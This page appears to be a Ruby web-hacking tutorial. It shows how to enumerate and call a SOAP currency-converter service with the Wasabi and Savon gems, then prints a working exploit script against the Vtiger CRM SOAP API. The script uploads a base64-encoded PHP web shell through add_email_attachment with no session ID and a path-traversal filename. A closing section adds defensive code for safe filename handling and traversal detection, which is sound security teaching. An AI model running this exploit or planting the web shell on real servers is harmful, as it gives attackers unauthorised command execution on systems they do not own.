Interacting with Web Services

SOAP - WSDL

Generally speaking, dealing with SOAP means dealing with XML messages and a WSDL file (also XML) that describes how to use a given SOAP API. Ruby has a really elegant way to do so, so let's get our hands dirty with an exploit.
  • Install the wasabi, savon & httpclient gems (wasabi parses the WSDL, savon builds and sends the SOAP requests, httpclient is the HTTP backend savon uses)

    gem install wasabi savon httpclient

Enumeration

require 'wasabi'

url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"

# Wrap the WSDL location; it is fetched and parsed on first use
document = Wasabi.document url

# Parsing the document (returns the Wasabi::Parser wrapping a Nokogiri document)
document.parser

# SOAP XML (the raw WSDL text)
document.xml

# Getting the endpoint
document.endpoint

# Getting the target namespace
document.namespace

# Enumerate all the SOAP operations/actions
document.operations

# Enumerate input parameters for particular operation
document.operation_input_parameters :conversion_rate

# Enumerate all available currencies: the Currency type is an XML Schema enumeration.
# This walks the parsed WSDL by child position, so it only works for this exact layout
document.parser.document.element_children.children[1].children[1].children[3].children[1].children.map {|c| c.attributes.values[0].to_s}
# Namespace-aware equivalent that does not depend on element positions
document.parser.document.xpath('//xs:simpleType[@name="Currency"]//xs:enumeration/@value', 'xs' => 'http://www.w3.org/2001/XMLSchema').map(&:value)
Results

>> url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
=> "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
>> document = Wasabi.document url
=> #<Wasabi::Document:0x00000002c79a50 @adapter=nil, @document="http://www.webservicex.net/CurrencyConvertor.asmx?WSDL">
>> # Parsing the document
>> document.parser
=> #<Wasabi::Parser:0x0000000281ebb8
 @deferred_types=[],
 @document=
  #(Document:0x140fa3c {
    name = "document",
    children = [
      #(Element:0x140f294 {
        name = "definitions",
        namespace = #(Namespace:0x14017e8 { prefix = "wsdl", href = "http://schemas.xmlsoap.org/wsdl/" }),
        attributes = [ #(Attr:0x1a507d4 { name = "targetNamespace", value = "http://www.webserviceX.NET/" })],
        children = [
          #(Text "\n "),
--- skipped ---
>> # Getting the endpoint
>> document.endpoint
=> #<URI::HTTP http://www.webservicex.net/CurrencyConvertor.asmx>
>> # Getting the target namespace
>> document.namespace
=> "http://www.webserviceX.NET/"
>> # Enumerate all the SOAP operations/actions
>> document.operations
=> {:conversion_rate=>
  {:action=>"http://www.webserviceX.NET/ConversionRate",
   :input=>"ConversionRate",
   :output=>"ConversionRateResponse",
   :namespace_identifier=>"tns",
   :parameters=>{:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}}}
>> # Enumerate input parameters for particular operation
>> document.operation_input_parameters :conversion_rate
=> {:FromCurrency=>{:name=>"FromCurrency", :type=>"Currency"}, :ToCurrency=>{:name=>"ToCurrency", :type=>"Currency"}}

Interaction

require 'savon'

url = "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL"
# Savon reads the WSDL and exposes each operation as a snake_cased symbol
client = Savon.client(wsdl: url)

# Message keys become child elements of the ConversionRate request element
message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}
response = client.call(:conversion_rate, message: message).body

# The response body is returned as a nested hash with snake_cased keys
response[:conversion_rate_response][:conversion_rate_result]
Results

>> message = {'FromCurrency' => 'EUR', 'ToCurrency' => 'CAD'}
=> {"FromCurrency"=>"EUR", "ToCurrency"=>"CAD"}
>> response = client.call(:conversion_rate, message: message).body
=> {:conversion_rate_response=>{:conversion_rate_result=>"1.4417", :@xmlns=>"http://www.webserviceX.NET/"}}

1.4415

Hacking via SOAP vulnerabilities

This is a working exploit for the Vtiger CRM SOAP API, going from authentication bypass to shell upload: the add_email_attachment operation accepts the request with no valid sessionid and stores the attachment under the client-supplied filename, so a base64-encoded PHP shell with a path-traversal filename is written to a web-accessible directory.

#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
# gem install savon httpclient
#
require 'savon'
require 'uri'

if ARGV.size < 1
  puts "[+] ruby #{__FILE__} [WSDL URL]"
  exit 0
else
  url = ARGV[0]
end

# PHP web shell and a randomised file name for it
shell_data, shell_name = "<?php system($_GET['cmd']); ?>", "shell-#{rand(100)}.php"

# Start client
client = Savon::Client.new(wsdl: url)

# List all available operations
puts "[*] List all available operations "
puts client.operations

puts "\n\n[*] Interact with :add_email_attachment operation"
response = client.call( :add_email_attachment,
  message: {
    emailid:   rand(100),
    filedata:  [shell_data].pack("m0"),            # base64 without line breaks
    filename:  "../../../../../../#{shell_name}",  # traverses out of the attachment directory
    filesize:  shell_data.size,                    # size of the raw shell, not of the base64
    filetype:  "php",
    username:  "KING",
    sessionid: nil                                 # no valid session is required
  }
)
puts "[+] PHP Shell on: http://#{URI.parse(url).host}/vtigercrm/soap/#{shell_name}?cmd=id"
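The request above only works because the server joins the client-supplied filename onto its attachment directory without normalising it. As an added illustration (not code from the page or from Vtiger), the following puts that vulnerable join beside a hardened version and feeds both the exploit's own payload, plus a small matcher for spotting traversal attempts in logged SOAP parameters. The upload directory, helper names, extension allow-list and sample filenames are assumptions for illustration.

```ruby
# The encoding the exploit uses for filedata: base64 without line breaks ("m0")
def encode_attachment(data)
  [data].pack('m0')
end

# Strict inverse; unpack1 with "m0" rejects malformed base64 instead of guessing
def decode_attachment(b64)
  b64.unpack1('m0')
end

# Vulnerable pattern: trust the filename from the SOAP message and join it onto the
# storage directory. Every "../" segment walks one level out of that directory.
def vulnerable_save_path(upload_dir, filename)
  File.join(upload_dir, filename)
end

# Assumed allow-list for an attachment store; .php is deliberately absent
ALLOWED_EXT = %w[.txt .pdf .png .jpg .jpeg].freeze

# Hardened version: keep only the last path segment (either separator style), reject
# empty, dot and NUL names, allow only known-safe extensions, and confirm the resolved
# absolute path still lies inside the upload directory.
def safe_save_path(upload_dir, filename)
  base = filename.to_s.split(%r{[\\/]}).last.to_s
  base = File.basename(base)
  if base.empty? || base == '.' || base == '..' || base.include?("\0")
    raise ArgumentError, "invalid filename: #{filename.inspect}"
  end
  ext = File.extname(base).downcase
  raise ArgumentError, "extension not allowed: #{ext.inspect}" unless ALLOWED_EXT.include?(ext)
  root = File.expand_path(upload_dir)
  path = File.expand_path(base, root)
  raise ArgumentError, 'path escapes upload directory' unless path.start_with?(root + File::SEPARATOR)
  path
end

# Detection helper: does a logged filename parameter carry a ".." segment
# delimited by either kind of separator (or the string boundary)?
def traversal_attempt?(filename)
  !!(filename.to_s =~ %r{(\A|[\\/])\.\.([\\/]|\z)})
end

if $PROGRAM_NAME == __FILE__
  dir     = '/var/www/vtigercrm/storage'           # assumed attachment directory
  payload = '../../../../../../shell-42.php'       # the exploit's filename with a fixed number
  puts "vulnerable: #{File.expand_path(vulnerable_save_path(dir, payload))}"
  begin
    safe_save_path(dir, payload)
  rescue ArgumentError => e
    puts "hardened rejected it: #{e.message}"
  end
  puts "hardened accepts: #{safe_save_path(dir, 'report.pdf')}"
  puts "traversal? #{traversal_attempt?(payload)}"
end
```

The hardened function fails the exploit twice over, on the `.php` extension and (had the extension been allowed) on the containment check; keeping both means a future change to the allow-list cannot silently reopen the traversal.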
More about Savon